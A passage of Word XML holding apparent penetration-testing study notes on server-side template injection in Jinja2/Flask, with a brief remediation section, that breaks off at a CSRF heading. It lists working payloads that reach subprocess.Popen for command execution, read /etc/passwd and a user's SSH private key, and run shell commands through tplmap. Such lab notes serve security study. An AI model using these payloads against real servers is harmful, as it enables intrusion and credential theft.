          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0431643E" w14:textId="0879D73C" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Determine language used by template engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4542D4D0" w14:textId="0C2C39F7" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>examine and research methods of developing shell code in said language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1FD0B8" w14:textId="2D6A9751" w:rsidR="00450981" w:rsidRDefault="007A6E65" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId121" w:history="1">
        <w:r w:rsidR="00450981" w:rsidRPr="00062852">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://janakiev.com/blog/python-shell-commands/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07172218" w14:textId="577A0175" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Creating PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E96DC56" w14:textId="70142B7A" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00450981">
        <w:t>http://MACHINE_IP:5000/profile/{% import os %}{{ os.system("whoami") }}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB56E57" w14:textId="629CF9D2" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Crafting a proof of concept (Jinja2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE1C126" w14:textId="13715856" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Python allows us to call the current class instance with .__class__, we can call this on an empty string:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27873E8D" w14:textId="778A4DE9" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Payload: http://MACHINE_IP:5000/profile/{{ ''.__class__ }}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239F6B82" w14:textId="6F402FAE" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Classes in Python have an attribute called .__mro__ that allows us to climb up the inherited object tree:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C777CD2" w14:textId="34D80157" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Payload: http://MACHINE_IP:5000/profile/{{ ''.__class__.__mro__ }}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428BAB79" w14:textId="4D94545C" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Since we want the root object, we can access the second property (first index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAB7767" w14:textId="25EF1163" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Payload: http://MACHINE_IP:5000/profile/{{ ''.__class__.__mro__[1] }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F5C3DE" w14:textId="04A76E8E" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Objects in Python have a method called .__subclassess__ that allows us to climb down the object tree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D4DBE8" w14:textId="7E56A6EB" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Payload: http://MACHINE_IP:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__() }}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164E460A" w14:textId="11E350F7" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="000B6144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>As this whole output is just a Python list, we can access this by using its index. You can find this by either trial and error, or by counting its position in the list.In this example, the position in the list is 400 (index 401):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142A871C" w14:textId="20B005B0" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="000B6144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Payload: http://MACHINE_IP:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401] }}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D9997F" w14:textId="5056219E" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="000B6144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The above payload essentially calls the subprocess.Popen method, now all we have to do is call it (use the code above for the syntax)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4E70BE" w14:textId="58A5CD33" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="000B6144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Payload: http://MACHINE_IP:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBE0394" w14:textId="12801FB2" w:rsidR="000B6144" w:rsidRDefault="007A6E65" w:rsidP="000B6144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId122" w:history="1">
        <w:r w:rsidR="000B6144" w:rsidRPr="00062852">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="287652E0" w14:textId="11CD1ADD" w:rsidR="000B6144" w:rsidRDefault="007A6E65" w:rsidP="000B6144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId123" w:history="1">
        <w:r w:rsidR="000B6144" w:rsidRPr="00062852">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6950769F" w14:textId="1248414A" w:rsidR="000B6144" w:rsidRDefault="000B6144" w:rsidP="000B6144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Examination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD7FFD" w14:textId="1CD4757D" w:rsidR="000B6144" w:rsidRDefault="000B6144" w:rsidP="000B6144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding how the template </w:t>
      </w:r>
      <w:r w:rsidR="006355C8">
        <w:t>processes user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DABFF53" w14:textId="06A40616" w:rsidR="006355C8" w:rsidRDefault="006355C8" w:rsidP="006355C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A3961" w14:textId="4EE94033" w:rsidR="006355C8" w:rsidRDefault="006355C8" w:rsidP="006355C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sanitization of user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6550C4A9" w14:textId="5ECC732E" w:rsidR="006355C8" w:rsidRDefault="006355C8" w:rsidP="006355C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>input as data rather than concatenating directly into template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8252A7" w14:textId="596B3DDD" w:rsidR="006355C8" w:rsidRDefault="007A6E65" w:rsidP="006355C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId124" w:history="1">
        <w:r w:rsidR="006355C8" w:rsidRPr="00062852">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://hackerone.com/reports/125980</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A4EF654" w14:textId="71B67B38" w:rsidR="00A54F4E" w:rsidRDefault="00A54F4E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Manual Exploitation of SSTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5135C296" w14:textId="1E57D1A2" w:rsidR="00A54F4E" w:rsidRDefault="00ED00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>inject {{2+2}} test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A11ECCC" w14:textId="3495D81A" w:rsidR="00ED00E4" w:rsidRDefault="00ED00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use PayloadAllTheThings to find payloads for Flask template engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2247EFD7" w14:textId="60E3350C" w:rsidR="00BF4A54" w:rsidRDefault="00ED00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED00E4">
        <w:t>{{ ''.__class__.__mro__[2].__subclasses__()[40]()(&lt;file&gt;).read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C9AC01" w14:textId="34F369CF" w:rsidR="00ED00E4" w:rsidRDefault="00ED00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows read files on server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792F08C1" w14:textId="7820CA90" w:rsidR="00ED00E4" w:rsidRDefault="00ED00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>loads file object in python and allows use of basic file operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D07FD8F" w14:textId="6DD00909" w:rsidR="00ED00E4" w:rsidRDefault="00ED00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>input /etc/passwd for example to enact LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F799D3" w14:textId="7C1C5BB7" w:rsidR="00BF4A54" w:rsidRDefault="00BF4A54" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED00E4">
        <w:t>{{ ''.__class__.__mro__[2].__subclasses__()[40]()(</w:t>
      </w:r>
      <w:r>
        <w:t>/home/test/.ssh/id_rsa</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED00E4">
        <w:t>).read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F76FB1" w14:textId="2EED4744" w:rsidR="00BC3A9D" w:rsidRDefault="00BC3A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>read user SSH private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117277F0" w14:textId="485DEF79" w:rsidR="00ED00E4" w:rsidRDefault="00ED00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED00E4">
        <w:t>{{config.__class__.__init__.__globals__['os'].popen</w:t>
      </w:r>
      <w:r w:rsidR="00301B6C">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED00E4">
        <w:t>&lt;command&gt;).read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3710FF6F" w14:textId="08ABF343" w:rsidR="00ED00E4" w:rsidRDefault="00ED00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED00E4">
        <w:t>{{config.__class__.__init__.__globals__['os'].popen(</w:t>
      </w:r>
      <w:r>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED00E4">
        <w:t>).read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3273ABCE" w14:textId="1EF72665" w:rsidR="00ED00E4" w:rsidRDefault="00ED00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cat out /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773163D1" w14:textId="198BBAAF" w:rsidR="00ED00E4" w:rsidRDefault="00ED00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows for RCE on server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB09A3" w14:textId="4377EBC6" w:rsidR="00B2569C" w:rsidRDefault="00ED00E4" w:rsidP="00B2569C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>imports os module and runs a command via popen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAF5296" w14:textId="57756B75" w:rsidR="00BC3A9D" w:rsidRDefault="00BC3A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Automatic Exploitation of SSTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA83D39" w14:textId="38A85328" w:rsidR="00BC3A9D" w:rsidRDefault="00BC3A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Tplmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8AE9A5" w14:textId="5EB0AFA4" w:rsidR="00BC3A9D" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId125" w:history="1">
        <w:r w:rsidR="00BC3A9D" w:rsidRPr="00F6684E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/epinna/tplmap</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B4E5929" w14:textId="2D06502B" w:rsidR="00BC3A9D" w:rsidRDefault="00BC3A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>requires python2 – python2 -m pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E5EFB" w14:textId="29D849AF" w:rsidR="00BC3A9D" w:rsidRDefault="00BC3A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698F8814" w14:textId="3CBF6587" w:rsidR="00BC3A9D" w:rsidRDefault="00BC3A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tplmap -u &lt;url&gt;/?&lt;vulnparameter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A6BBFF" w14:textId="2F5AFEEA" w:rsidR="00BC3A9D" w:rsidRDefault="00BC3A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tplmap -u &lt;url&gt; -d ‘&lt;vulnparamter&gt;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F22575" w14:textId="657F3127" w:rsidR="00BC3A9D" w:rsidRDefault="00BC3A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. ./tplmap.py -u </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00F6684E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;:&lt;port&gt;/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -d ‘name’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8D94CF" w14:textId="302F2391" w:rsidR="00BC3A9D" w:rsidRDefault="00BC3A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. ./tplmap.py -u </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00F6684E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;:&lt;port&gt;/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -d ‘name’ - -os-cmd “id”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B742ED2" w14:textId="3911D785" w:rsidR="00BC3A9D" w:rsidRDefault="00BC3A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC3A9D">
        <w:t>tplmap.py -u http://10.10.10.10:5000/ -d 'noot' --os-cmd "cat /etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85DB22" w14:textId="2243B351" w:rsidR="00BC3A9D" w:rsidRDefault="00BC3A9D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cat out /etc/passwd using tplmap with vulnparameter “not”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A42EA44" w14:textId="2CAA28C5" w:rsidR="00230247" w:rsidRDefault="00230247" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>TPLMAP IS NO LONGER ACTIVELY SUPPORTED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EAC564" w14:textId="6219E8C3" w:rsidR="00230247" w:rsidRDefault="00230247" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17035B48" w14:textId="0D041685" w:rsidR="00230247" w:rsidRDefault="00230247" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>occurs when a user visits a page on a site that performs an action on a different site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E0B12C" w14:textId="322C7B25" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
